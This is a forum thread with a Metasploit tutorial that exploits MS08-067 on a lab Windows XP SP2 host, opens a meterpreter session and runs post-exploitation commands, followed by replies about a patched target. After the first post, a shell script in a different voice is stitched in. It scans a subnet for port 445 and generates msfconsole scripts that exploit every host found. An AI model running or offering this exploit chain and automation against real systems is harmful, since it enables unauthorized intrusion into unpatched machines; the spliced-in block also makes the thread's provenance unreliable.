Page 1 of 2 (Results 1 to 10 of 12)

Thread: introduction to metasploit

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Location
    /home
    Posts
    43

    Default introduction to metasploit

    This tutorial will give a basic introduction to metasploit.
    In the process, we'll also exploit a machine and run meterpreter on it.

    Everything that needs to be typed into the console uses the code tag,
    for example:
    Code:
    msfconsole
    Also, I assume you have some basic understanding of networking and Linux.
    WARNING: it is illegal to access a machine in any way that you do not have permission to access, and it might land you in jail. I am not responsible for the actions you take. You have been warned.

    Now on to the actual guide.

    Requirements:
    BackTrack 4 final
    Non-patched Windows XP SP2 box
    (confirmed that this does not work on XP SP3)
    Some patience

    These are my IPs; make sure to change them to reflect your own settings:
    attacker: 192.168.198.129
    victim: 192.168.198.130

    OK, first things first, make sure that Metasploit is updated
    (the two numbers are the menu choices at fast-track's interactive prompt):
    Code:
    /pentest/exploits/fasttrack/fast-track.py -i
    1
    2

    Do an nmap scan to make sure there are some open ports (with hopefully vulnerable services):

    Code:
    nmap -v 192.168.198.130
    Nmap is done scanning and showed me 3 open ports. (If yours says filtered on all ports, try turning off any firewall.)
    These are ports 135, 139 and 445.
    We're going to focus on port 445.
    A quick search on Google shows us that port 445 is commonly used for SMB.

    Start up Metasploit:
    Code:
    msfconsole
    When it's done loading,
    Code:
    show exploits windows
    We need an exploit for SMB, so we need to choose one from the smb folder. I used the ms08_067_netapi exploit.
    Code:
    use windows/smb/ms08_067_netapi
    Notice that after we typed this, the prompt msf > changed to msf exploit(ms08_067_netapi) >

    Great, so now we have an exploit, but what next?
    An exploit is useless without a payload, so:
    Code:
    show payloads
    This will give us a list of payloads compatible with the exploit.
    We're going to use a meterpreter payload for this tutorial:
    Code:
    set payload windows/meterpreter/bind_tcp
    Now to configure it all:
    Code:
    info
    set target 3
    set rhost 192.168.198.130
    target is which Windows version and service pack our victim runs (in our case XP SP2),
    though you could also leave it as it is.
    rhost is the IP of the victim.
    Everything else can be left at its default.
    If the payload were a reverse TCP one, we would also need to set lhost;
    lhost is the attacker's IP.
    Code:
    exploit
    This is what we (should) get:
    [*] Started bind handler
    [*] Triggering the vulnerability...
    [*] Sending stage (723456 bytes)
    [*] Meterpreter session 1 opened (192.168.198.129:60087 -> 192.168.198.130:4444)

    meterpreter >
    Great! We're in!
    Let's see what commands we have at our disposal:
    Code:
    help
    Under what username is meterpreter running?
    Code:
    getuid
    What processes are running?
    Code:
    ps
    And so we could go on and on about what we can do with meterpreter, but that is outside the scope of this tutorial.

    Hope this guide has been useful to someone, somewhere.

    For a more in-depth guide to what Metasploit can do, check this link:
    Metasploit Unleashed - Mastering the Framework
    Last edited by EcKo; 01-23-2010 at 04:30 AM. Reason: cleaning up.
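    The whole procedure in the post above (scan, pick the exploit, pick a bind or reverse payload, set rhost and, for reverse payloads, lhost, then exploit), as an added shell example that is not part of the original post: it takes nmap's grepable output and turns it into a msfconsole resource script that you run with msfconsole -r. The constructed scan text, the smb_hosts and gen_rc function names and the use of nmap's -oG output are my assumptions; the IPs, module and payload names are the tutorial's.

```shell
#!/bin/sh
# Added example, not code from the original post: automate the walkthrough
# by (1) picking the hosts with 445/tcp open out of an nmap grepable report
# and (2) writing a msfconsole resource script for ms08_067_netapi.
# Assumptions: nmap was run with -oG, and the IPs and payload names are the
# tutorial's (192.168.198.129 attacker, 192.168.198.130 victim).

# Constructed sample of `nmap -oG -` output (not a real scan). The second
# host has 445 closed and must be skipped.
SAMPLE_GNMAP='# Nmap scan initiated (constructed sample)
Host: 192.168.198.130 ()  Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
Host: 192.168.198.131 ()  Ports: 135/filtered/tcp//msrpc///, 445/closed/tcp//microsoft-ds///
# Nmap done (constructed sample)'

# smb_hosts GNMAP_TEXT: print the IP of every host reported with 445/tcp open.
smb_hosts() {
    printf '%s\n' "$1" | awk '/^Host:/ && / 445\/open\/tcp/ { print $2 }'
}

# gen_rc RHOST PAYLOAD [LHOST] [TARGET]: write a resource script to stdout.
# A bind payload only needs RHOST; a reverse payload also needs LHOST (the
# attacker's IP), which is the distinction the post makes. TARGET defaults
# to 0 (automatic targeting); the post used 3 for XP SP2.
gen_rc() {
    rhost=$1; payload=$2; lhost=$3; target=${4:-0}
    case $payload in
        *reverse*)
            if [ -z "$lhost" ]; then
                echo "gen_rc: $payload is a reverse payload and needs LHOST" >&2
                return 1
            fi ;;
    esac
    printf 'use windows/smb/ms08_067_netapi\n'
    printf 'set PAYLOAD %s\n' "$payload"
    printf 'set RHOST %s\n' "$rhost"
    printf 'set TARGET %s\n' "$target"
    if [ -n "$lhost" ]; then
        printf 'set LHOST %s\n' "$lhost"
    fi
    # `check` fingerprints the target before firing; a host that is already
    # patched (the "no session was created" case later in the thread) shows
    # up here instead of after a failed exploit attempt.
    printf 'check\nexploit\n'
}

# Usage (commented out so the file is safe to source for the functions):
#   for h in $(smb_hosts "$(nmap -p 445 -oG - 192.168.198.0/24)"); do
#       gen_rc "$h" windows/meterpreter/bind_tcp "" 3 > "ms08_067_$h.rc"
#   done
#   msfconsole -r ms08_067_192.168.198.130.rc
```

    Metasploit option names are case-insensitive, so set RHOST in the generated script and the post's set rhost are the same thing. If check reports the target as not vulnerable, expect the "Exploit completed, but no session was created" result shown later in this thread rather than a meterpreter prompt.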

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    127.0.0.1
    Posts
    16

    Default Re: introduction to metasploit

    Nice one, _EcKo

    Thank you.

    If anyone might want to learn more about metasploit, read here : Metasploit Unleashed - Mastering the Framework

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    36

    Default Re: introduction to metasploit

    Very good,
    thanks for sharing.

  4. #4
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    2

    Default Re: introduction to metasploit

    Good post, thanks! I'll have to try this out when I get back.

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    south america
    Posts
    7

    Default Re: introduction to metasploit

    First of all: thanks!

    I have a little question... I used the option "set target 0" too, for an automatic test of the OS version etc., but this is the result:

    Code:
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 3 - lang:English
    [*] Selected Target: Windows XP SP3 English (NX)
    [*] Triggering the vulnerability...
    [*] Exploit completed, but no session was created.
    The firewall is off and the antivirus too... I am using VirtualBox.
    Maybe the system is patched against this kind of exploit?

    In this case, is it possible to do something more with this exploit, or can I consider this a closed way?

    Thanks (and sorry for my strange English)

  6. #6
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default Re: introduction to metasploit

    Quote Originally Posted by reahel
    First of all: thanks!

    I have a little question... I used the option "set target 0" too, for an automatic test of the OS version etc., but this is the result:

    Code:
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 3 - lang:English
    [*] Selected Target: Windows XP SP3 English (NX)
    [*] Triggering the vulnerability...
    [*] Exploit completed, but no session was created.
    The firewall is off and the antivirus too... I am using VirtualBox.
    Maybe the system is patched against this kind of exploit?

    In this case, is it possible to do something more with this exploit, or can I consider this a closed way?

    Thanks (and sorry for my strange English)
    Your system is probably already patched against the MS08-067 vulnerability. It was published in Oct. 2008; here's the link.

  7. #7
    Member Mr-Protocol's Avatar
    Join Date
    Jan 2010
    Location
    Ohio
    Posts
    142

    Default Re: introduction to metasploit

    Here is a lot of information on Metasploit from the folks at Offensive Security: Metasploit Unleashed - Mastering the Framework. Edit: Whoops, didn't see Linus1907 already posted it.
    I did a 45-minute presentation on that Metasploit Unleashed page and did most of the things on that page.

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    south america
    Posts
    7

    Default Re: introduction to metasploit

    ...nothing to do... for 'my' version of XP.
    But I am beginning to understand how Metasploit works... and I am happy about this.

    Thanks! The link is great! And this community is really active!

  9. #9
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default Re: introduction to metasploit

    Quote Originally Posted by Mr-Protocol
    Here is a lot of information on Metasploit from the folks at Offensive Security: Metasploit Unleashed - Mastering the Framework. Edit: Whoops, didn't see Linus1907 already posted it.
    I did a 45-minute presentation on that Metasploit Unleashed page and did most of the things on that page.
    Definitely worthy of mentioning. The Metasploit Unleashed course took me from maybesploit to megasploit in just 2 days.

    Good job as well, _EcKo. Thanks.

  10. #10
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    Melbourne, Australia
    Posts
    2

    Default Re: introduction to metasploit

    I wonder if this'll work with XP SP3.
    I'll definitely try it tonight.
    Cheers.
